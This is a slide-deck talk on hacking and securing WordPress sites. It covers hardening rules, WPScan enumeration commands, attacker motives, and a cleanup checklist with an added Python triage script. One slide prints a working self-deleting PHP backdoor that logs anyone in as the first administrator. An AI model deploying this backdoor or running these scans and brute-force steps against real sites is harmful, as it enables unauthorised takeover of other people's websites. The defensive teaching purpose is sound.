Daniele Scasciafratte - WP Teramo
@wpteramo

Hacking (and securing) a WordPress site!

How to sleep well and not cry in a corner

Created by Daniele Scasciafratte

Daniele Scasciafratte

  • Co-founder/CTO of Codeat
  • Open Source addict
  • WordPress Core Contributor/Developer
  • ClassicPress Founding Committee
  • WordPress Rome/Terni meetup
  • Mozillian & Mozilla Reps & Mozilla TechSpeaker
  • President of Industria Italiana Software Libero

Who is a hacker?

A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, unlike most users, who prefer to learn only the minimum necessary.

Hackers are professionals

We are the Angelas of IT

Serious time!

A hacker wants to explain how he or she achieved the results, to improve the technology but also himself or herself and others.

Let's start with culture time!

https://w3techs.com/technologies/details/cm-wordpress/all/all

First steps for a normal user

  • Password
  • Yes, a strong password
  • What do you think a user needs?

Often the bugs are in plugins

  • Missing sanitization
  • Features meant for logged-in users reachable by non-logged-in users
  • Non-standard
    • UI
    • Custom code that doesn't use the WordPress framework
    • Reimplementation of features WordPress already provides

Golden rules for an administrator

  • Block access to wp-admin
  • Block directory listing on the web server
  • Always update WordPress and plugins
    • Especially premium stuff from marketplaces
  • Block comments and other interactions for non-logged-in users
  • Check file permissions
  • Ban bots and bad IPs
  • Enable brute-force protection
  • Remove user 1 (admin)
  • Block XML-RPC/REST API if you don't need them

Golden rules for a hacker

Tools time

Online tools

We are forgetting the real tools

WP-CLI checksum

WPScan

  • Enumerate plugins and their versions
    • Whether exploitable
    • Common misconfigurations
    • Other information
  • Enumerate users
  • Brute force usernames
  • Requests with a long timeout or with throttling
  • Random user agent
  • Multiple threads

First commands to run

wpscan --url www.example.com
wpscan --url www.example.com --enumerate

Two commands are enough to understand whether the website is managed professionally or not.

WPSeku

  • WPScan rewritten in Python
  • Focuses on plugin code (if it is in the wp.org repository)
    • For XSS
    • For use of critical methods
  • Brute-forces usernames, also via XML-RPC

No other CLI tools

Cool stuff

Backdoor

<?php
// Deletes itself once executed, so the dropped file leaves no trace on disk
@unlink(__FILE__);

// Loads WordPress from the site root, three directories up from where the file was dropped
require('../../../wp-blog-header.php');
require('../../../wp-includes/pluggable.php');
$user_info = get_userdata(1);
// Automatic login as user ID 1, the first account created at install time //
$username = $user_info->user_login;
$user = get_user_by('login', $username );
// Redirect URL //
if ( !is_wp_error( $user ) )
{
    wp_clear_auth_cookie();
    wp_set_current_user ( $user->ID );
    wp_set_auth_cookie  ( $user->ID );

    $redirect_to = user_admin_url();
    wp_safe_redirect( $redirect_to );

    exit();
}

https://github.com/mattiasgeniar/php-exploit-scripts/blob/master/found_on_wordpress/backdoor_admin_access.php

Fix a hacked website

  • Download everything locally
  • Download a clean version of
    • WordPress
    • Every plugin
    • Every theme
  • Search for PHP files in wp-content/uploads/*.php
  • Search for files with a suspicious last-modified date
  • Compare your clean and hacked versions with a diff tool
    • Sometimes there are dropped files with legitimate-looking names, like class-ftp-inc.php
    • Sometimes obfuscated code is prepended to a few or all of the files
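The checklist above as a runnable triage script (an added example, not code from the talk): it walks a downloaded copy of the site next to a clean copy of WordPress, plugins and themes, and reports PHP files under wp-content/uploads, files that are not in the clean copy, files whose content differs, and PHP files containing obfuscation constructs. The two sample trees, the dropped file names and the eval/base64 stub are constructed for the demo; the pattern list is an assumption and deliberately small.

```python
import re
import tempfile
from pathlib import Path

# Constructs typical of injected/obfuscated PHP (assumption: a small illustrative list, not exhaustive)
SUSPICIOUS = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def triage(clean: Path, hacked: Path) -> dict:
    clean_files = {p.relative_to(clean) for p in clean.rglob("*") if p.is_file()}
    report = {"php_in_uploads": [], "added": [], "modified": [], "suspicious": []}
    for path in sorted(p for p in hacked.rglob("*") if p.is_file()):
        rel = path.relative_to(hacked)
        name = rel.as_posix()
        if rel.parts[:2] == ("wp-content", "uploads"):
            # uploads are user content and never in the clean copy; only PHP there is a red flag
            if path.suffix == ".php":
                report["php_in_uploads"].append(name)
        elif rel not in clean_files:
            report["added"].append(name)        # e.g. a dropped class-ftp-inc.php
        elif path.read_bytes() != (clean / rel).read_bytes():
            report["modified"].append(name)     # what the diff tool would show
        if path.suffix == ".php" and SUSPICIOUS.search(path.read_text(errors="ignore")):
            report["suspicious"].append(name)   # obfuscated code prepended or injected
    return report

def write_tree(root: Path, files: dict) -> None:
    for rel, data in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)

def demo() -> dict:
    # Constructed sample trees: a clean WordPress subset and the same site after a compromise
    clean_files = {
        "wp-blog-header.php": b"<?php\nrequire __DIR__ . '/wp-load.php';\n",
        "wp-includes/class-ftp.php": b"<?php\nclass ftp {}\n",
        "wp-content/plugins/hello.php": b"<?php\n// Hello Dolly\n",
    }
    hacked_files = dict(clean_files)
    # constructed injection: an obfuscated stub prepended to a core file ('AAAA' is a placeholder payload)
    hacked_files["wp-blog-header.php"] = b"<?php eval(base64_decode('AAAA')); ?>" + clean_files["wp-blog-header.php"]
    hacked_files["wp-includes/class-ftp-inc.php"] = b"<?php\n// constructed dropped file\n"
    hacked_files["wp-content/uploads/2019/image.php"] = b"<?php\n// constructed dropped file\n"
    hacked_files["wp-content/uploads/2019/photo.jpg"] = b"\xff\xd8\xff\xe0JFIF"  # legitimate upload
    with tempfile.TemporaryDirectory() as tmp:
        clean, hacked = Path(tmp, "clean"), Path(tmp, "hacked")
        write_tree(clean, clean_files)
        write_tree(hacked, hacked_files)
        return triage(clean, hacked)
```

Point triage() at a real download and a freshly downloaded clean copy to get the same four lists for a live case; the last-modified-date check is still worth doing separately, since a `diff` cannot see it.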

Why would I want to hack your website?

  • Ransom (data, files, domain, server)
  • Scam
    • Redirects
    • Search engine ranking
  • Phishing
  • Malware (server, visitors)
  • Access to server resources (mining)
  • Spam
  • Other services on the server
  • Fun

Suggested plugins to improve security

  • iThemes Security
  • Wordfence Security

Thanks!

- http://mte90.tech/Talk-Secure-WP